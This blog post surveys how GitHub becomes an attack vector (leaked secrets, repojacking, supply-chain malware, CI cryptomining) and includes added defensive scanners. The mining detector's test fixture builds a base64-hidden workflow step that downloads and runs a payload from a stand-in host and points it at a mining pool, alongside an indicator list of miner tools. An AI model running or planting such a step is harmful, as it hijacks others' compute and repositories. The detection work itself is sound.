GitHub — Through the Eyes of IT Cops

Suraif Muhammad
UCSC ISACA Student Group
Jan 12, 2023
Photo by Eran Medan on www.arnica.io

What is GitHub?

GitHub is a web-based platform that helps developers store and manage their code repositories. It also provides a range of features that make it easier for developers to collaborate on projects, including the ability to track issues and submit changes to code. In addition to hosting code, GitHub also provides tools for project management and documentation, and it is a popular platform for open-source projects.

Who are IT cops?

We all know who cops or police are, right? A police force is a constituted body of personnel empowered by a state to enforce the law, protect citizens' safety, health and property, and prevent crime and civil disorder. So who are the IT cops? They do the same job in the domain of IT, and professionally they are known as cyber security experts. Defending computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks is what they do. Be it networking, DevOps, cloud, or software development, there is a security aspect anywhere and everywhere. Whenever you join a company, its cyber security team keeps an eye on what you do, to check that you are doing what you are supposed to do and nothing you aren't.

So if cyber security experts are the cops, who are the criminals? Hackers! They, too, are often highly skilled developers, but with venom added. Yes, you heard it right: they are developers too, and fittingly they love GitHub just as all developers do. If all that code is available on one platform, and much of it is open, why wouldn't they? Also, have you ever wondered who the other person contributing to your open-source project is? Most of the time you don't know who they are, where they are from, or what they look like, yet you work alongside them. Couldn't that be an attacker?

Photo by Tima Miroshnichenko on pexels.com

You know what? There is no such status as "safe" on the internet. Either you have already been breached or you are in the process of being breached or compromised. Hackers break into systems for various motives. The most prominent one is money, but there are others, such as cyberwarfare: launching attacks on the digital systems of an opposing party.

OK, now let's take a look at some examples of how GitHub becomes a gateway for cyber attacks.

  • GitHub & Code vulnerabilities

Have you ever wondered whether our code is secure before uploading or presenting it? There could be a lot of vulnerabilities in the code itself. Not every bug is a vulnerability. A bug is when the system isn't behaving as it's supposed to, whereas a vulnerability is a bug that gives an attacker an opportunity for exploitation. Humans, being the weakest link in cyber security, are negligent and upload sensitive data like the following to GitHub, where it is exploited briskly by hackers:

  1. Passwords
  2. Tokens
  3. API keys
  4. IP information
  5. Sensitive domains, infrastructure details
  6. AWS, GCP, Azure Keys, and other secrets
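The check that stops most of these leaks is a secret scan run before the commit leaves the developer's machine, for example as a pre-commit hook. The following is an added example, not code from the original post: a small Python scanner over a constructed set of files (none of the values are real credentials; the AWS key is the placeholder AWS uses in its own documentation). The `# allow-secret` marker and the placeholder filter are conventions assumed for this example, so that templated config values and reviewed false positives do not drown the real hits:

```python
import re
import sys

# Added example (not from the original post): a minimal secret scanner that can
# run as a pre-commit hook. The AWS access-key and GitHub token prefixes are
# documented public formats; the hardcoded-credential pattern is deliberately
# loose, so every hit is a lead to review rather than proof of a leak.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "hardcoded_credential": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|api[_-]?key|token)\b\s*[=:]\s*"
        r"['\"]([^'\"\s]{8,})['\"]"),
}

# Values that are clearly templates rather than live secrets.
PLACEHOLDER_MARKERS = ("${", "{{", "<", "changeme", "example")

# A reviewable, explicit per-line opt-out (hypothetical marker, our own convention).
ALLOW_MARKER = "# allow-secret"


def looks_like_placeholder(value):
    lowered = value.lower()
    return any(marker in lowered for marker in PLACEHOLDER_MARKERS)


def scan_text(text, path="<stdin>"):
    """Return a list of findings for one file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if ALLOW_MARKER in line:
            continue
        for name, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(line):
                if name == "hardcoded_credential" and looks_like_placeholder(match.group(1)):
                    continue
                token = match.group(0)
                findings.append({
                    "path": path,
                    "line": lineno,
                    "type": name,
                    # Never echo the whole secret back into a log or terminal.
                    "preview": token[:6] + "..." if len(token) > 6 else token,
                })
    return findings


def scan_files(files):
    """files maps path -> contents; returns all findings in path order."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_text(files[path], path))
    return findings


# Constructed sample repository contents. None of these are real credentials;
# the AWS key is the placeholder AWS uses in its own documentation.
SAMPLE_FILES = {
    "config/settings.py": (
        "DEBUG = False\n"
        "DB_PASSWORD = 'hunter2hunter2'\n"
        "API_KEY = '${API_KEY}'\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
    ),
    "deploy/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXkt\n",
    "README.md": "TOKEN = 'ghp_" + "x" * 36 + "'  " + ALLOW_MARKER + "\n",
}


if __name__ == "__main__":
    # As a hook: pass the staged file paths; exit non-zero on any finding.
    if len(sys.argv) > 1:
        files = {}
        for p in sys.argv[1:]:
            with open(p, encoding="utf-8", errors="replace") as fh:
                files[p] = fh.read()
    else:
        files = SAMPLE_FILES
    hits = scan_files(files)
    for hit in hits:
        print(f"{hit['path']}:{hit['line']}: {hit['type']} ({hit['preview']})")
    sys.exit(1 if hits else 0)
```

On the constructed sample the scanner reports the hardcoded database password, the AWS access key and the private key file, skips the `${API_KEY}` template value, and honours the opt-out on the README line. Wired in as `git diff --cached --name-only | xargs python scan_secrets.py`, the non-zero exit blocks the commit; the redacted preview is deliberate, because a hook that prints the full secret just moves the leak into the CI log.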

Also, like any product, GitHub itself can contain zero-day vulnerabilities, that is, vulnerabilities not yet identified by the developers of the product, which hackers could exploit. One reported weakness in the platform, described in the linked article, is called repojacking (repository + hijacking). When a GitHub user renames their account, the old username becomes available again and GitHub redirects the old repository URLs to the new name. A repository URL is made of the username and the repository name, so if an attacker registers the abandoned username and creates a repository with the same name, the redirect no longer applies: anyone still fetching from the old URL gets the attacker's repository, with whatever malicious code it contains, instead of the renamed one.
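The practical check, for anyone consuming dependencies by GitHub URL, is whether a dependency still lives at the path it is referenced by. The following is an added example, not code from the original post or from GitHub: it parses git-style dependency strings and flags those that only resolve through an owner redirect (the precondition for repojacking) or that no longer exist. The `resolve` lookup is a hypothetical function, backed here by a constructed table; a real version would query the GitHub API and follow the redirect.

```python
import re

# Added example (not from the original post): flag dependencies whose GitHub
# path only works through a username redirect, which is the precondition for
# repojacking. `resolve` is a hypothetical lookup (owner, repo) -> canonical
# (owner, repo), or None if nothing is there; a real version would ask the
# GitHub API and follow the redirect. Here it is backed by a constructed table.

GITHUB_REF = re.compile(
    r"^(?:https?://github\.com/|git@github\.com:|github\.com/)"
    r"(?P<owner>[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)/"
    r"(?P<repo>[A-Za-z0-9_.-]+?)(?:\.git)?/?(?:[@#].*)?$"
)


def parse_github_ref(dep):
    """Return (owner, repo) in lower case for a GitHub dependency string, else None."""
    match = GITHUB_REF.match(dep.strip())
    if not match:
        return None
    return (match.group("owner").lower(), match.group("repo").lower())


def find_repojackable(deps, resolve):
    """Return (dep, reason) for every GitHub dependency that does not live at
    the path it is referenced by. A redirect means the old owner name is free
    for anyone to register; a missing repository means the name already dangles."""
    findings = []
    for dep in deps:
        ref = parse_github_ref(dep)
        if ref is None:
            continue                      # not a GitHub reference
        canonical = resolve(*ref)
        if canonical is None:
            findings.append((dep, "missing: owner/repo no longer exists"))
        elif (canonical[0].lower(), canonical[1].lower()) != ref:
            findings.append((dep, "redirect: now lives at %s/%s" % canonical))
    return findings


# Constructed fixture standing in for GitHub's answers.
FIXTURE = {
    ("acme", "widgets"): ("acme", "widgets"),          # lives where referenced
    ("olduser", "cli-tool"): ("newuser", "cli-tool"),  # owner renamed; redirect in place
    ("ghost", "lib"): None,                            # deleted
}


def fixture_resolve(owner, repo):
    return FIXTURE.get((owner, repo))


# Constructed dependency list in the styles of pip, Go and npm git references.
SAMPLE_DEPS = [
    "https://github.com/acme/widgets.git",
    "git@github.com:OldUser/cli-tool.git",
    "github.com/ghost/lib@v0.3.1",
    "https://pypi.org/project/requests/",   # not GitHub; ignored
]

if __name__ == "__main__":
    for dep, reason in find_repojackable(SAMPLE_DEPS, fixture_resolve):
        print(f"{dep}: {reason}")
```

The fix for a flagged entry is to reference the canonical owner directly and to pin a commit hash rather than a branch or tag name: a hijacked repository can serve different content under the same tag, but it cannot produce different content for the same commit hash.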

  • GitHub Supply chain attacks

Most companies have their code on GitHub. What if an attacker could come along and add malicious code to it? And what if another company then uses that code in their own project? Now the malicious code has entered the supply chain. That is where supply chain attacks come into the picture.

  • Hosting malware on GitHub — Hackers write malware and push it to your repository as a collaborator, pretending to contribute fixes for the issues in your code.
  • Hacking groups using GitHub

Also known as APT (Advanced Persistent Threat) groups, they possess extraordinary skills and resources, enabling them to infiltrate an organization's network and exfiltrate data from it. APTs use a variety of tactics, techniques, and tools — such as highly targeted social engineering, ransomware, vulnerability exploits, and zero-days — to achieve their illicit objectives. They often attempt to gain undetected access to a network and then remain silently persistent, establish a backdoor, and/or steal data rather than cause damage. Examples of such groups are Leviathan, LazyScripter, and Lazarus. There have also been reported incidents in which specialized tools built by cyber security organizations were stolen and then used to attack other organizations.

  • Abusing cloud computing resources, crypto mining using GitHub

Threat actors use automated campaigns to create new accounts on these platforms and run cryptocurrency miners in containers, abusing continuous integration and deployment (CI/CD) service providers like GitHub (GitHub Actions), Heroku, Buddy.works, and Togglebox. They engage in "freejacking", taking advantage of whatever resources are offered to free accounts in an effort to increase their profits. "Play and run" describes threat actors who use paid resources, in this case for crypto mining, for financial gain and then refuse to pay their bills until their accounts are frozen, at which point they abandon the accounts and move on.
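A repository owner can look for this abuse in the workflow files themselves. The following is an added example, not code from the original post or from any of the providers named above: a heuristic scan of GitHub Actions workflow text for well-known mining indicators (stratum pool URLs, the xmrig miner and its `--donate-level` option). Since miners planted in CI jobs are commonly wrapped in base64 and piped to a shell, the scan also decodes base64-looking blobs and inspects the decoded layer. The two workflows are constructed, and the pool host is a reserved `.invalid` name that never resolves.

```python
import base64
import glob
import re

# Added example (not from the original post): a heuristic scan of GitHub
# Actions workflow text for cryptomining indicators. Miners hidden in CI jobs
# are often wrapped in base64 (`echo <blob> | base64 -d | sh`), so the scan
# also decodes base64-looking blobs and inspects the decoded layer.

MINER_INDICATORS = [
    ("mining_pool_url", re.compile(r"stratum\+(?:tcp|ssl)://", re.I)),
    ("known_miner_binary", re.compile(r"\b(?:xmrig|minerd|cpuminer|ethminer)\b", re.I)),
    ("xmrig_flag", re.compile(r"--donate-level", re.I)),
]

# Runs of the base64 alphabet long enough to hide a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_blobs(text):
    """Base64-decode every blob in text that decodes to printable UTF-8."""
    out = []
    for match in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                                 # not really base64
        if all(ch.isprintable() or ch in "\n\r\t" for ch in decoded):
            out.append(decoded)
    return out


def scan_workflow(text, decode_depth=2):
    """Return the sorted indicator names found in text, looking through up to
    decode_depth layers of base64 encoding (0 = raw text only)."""
    hits = set()
    layers = [text]
    for level in range(decode_depth + 1):
        for layer in layers:
            for name, pattern in MINER_INDICATORS:
                if pattern.search(layer):
                    hits.add(name)
        if level == decode_depth:
            break
        layers = [s for layer in layers for s in decoded_blobs(layer)]
    return sorted(hits)


# Constructed workflows. The "setup" step hides a miner launch behind base64;
# the pool host is a reserved .invalid name and never resolves.
HIDDEN_COMMAND = (
    "curl -sL http://dl.example.invalid/x -o /tmp/x && /tmp/x "
    "-o stratum+tcp://pool.example.invalid:3333 --donate-level 1"
)
HIDDEN_BLOB = base64.b64encode(HIDDEN_COMMAND.encode()).decode()

SUSPICIOUS_WORKFLOW = f"""name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: setup
        run: echo {HIDDEN_BLOB} | base64 -d | bash
      - run: make test
"""

BENIGN_WORKFLOW = """name: CI
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: make test
"""

if __name__ == "__main__":
    # Scan every workflow in the current repository.
    for path in glob.glob(".github/workflows/*.y*ml"):
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = scan_workflow(fh.read())
        if found:
            print(f"{path}: {', '.join(found)}")
```

With `decode_depth=0` the suspicious workflow scans clean, which is exactly the point of the encoding; one decode layer exposes the pool URL and the miner flag. Indicator lists like this catch the lazy campaigns the paragraph describes, not a determined attacker; the durable controls are on the provider side (account verification, quotas, billing enforcement), which is why the "play and run" pattern ends with frozen accounts rather than detected workflows.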

What can we do to prevent this?

Photo by Clive Hornsby on obtsynergy.com

As I mentioned before, humans are the weakest link in cyber security. If we act carefully, expecting a breach at any time, most of these problems can be avoided. Proper awareness of cyber security, securing the login credentials of GitHub accounts, enabling multi-factor authentication, securing the repositories, using code and secret scanning (GitHub's own security features) before commits, signing commits and releases, not exposing sensitive data in public repositories, and monitoring GitHub for suspicious activity would go a long way towards reducing these threats.

Sounds scary? That is exactly why cyber security is in such high demand at the moment. With the drastic increase in digitalization, protecting data has become a top priority for every organization and individual, and it is not easy to find the right people with the right skills. Since GitHub is a productive tool despite the vulnerabilities that human negligence introduces, cyber security experts use it constructively to handle cyber threats: sharing threat intelligence (how can an attacker attack your networks? who is it, what is their IP address, what files are used?), collaborating on tools for detection and prevention, sharing threat hunting queries, and documenting SIEM (Security Information and Event Management) implementations and rules. Phew! How versatile this masterpiece, GitHub, is!

Connect with me on Medium, LinkedIn, Twitter, and Instagram for more content.


Tech enthusiast | Reading Computer Science & ACCA | Gold Microsoft Learn Student Ambassador | Postman Student Leader